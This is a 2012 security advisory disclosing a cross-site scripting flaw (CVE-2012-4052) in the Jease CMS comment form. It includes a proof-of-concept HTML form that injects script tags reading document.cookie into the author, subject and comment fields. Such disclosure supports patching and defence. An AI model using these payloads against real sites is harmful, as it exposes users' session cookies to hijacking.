Cross-Site Scripting (XSS) in Jease

2012-07-25T00:00:00
ID HTB23104
Type htbridge
Reporter High-Tech Bridge
Modified 2012-07-30T00:00:00

Description

High-Tech Bridge Security Research Lab discovered vulnerability in Jease, which can be exploited to perform Cross-Site Scripting (XSS) attacks.

1) Cross-Site Scripting (XSS) in Jease: CVE-2012-4052
Input passed via the "author", "subject" and "comment" POST parameters when creating a new comment is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of an affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
<form action="http://[host]:8080/blog/" method="post" name="main" id="main">
<input type="hidden" name="author-467844289" value='"><script>alert(document.cookie);</script>'>
<input type="hidden" name="subject-467844289" value='"><script>alert(document.cookie);</script>'>
<input type="hidden" name="comment-467844289" value='"></textarea><script>alert(document.cookie);</script>'>
<input type="submit" name="Submit" value="Send">
</form>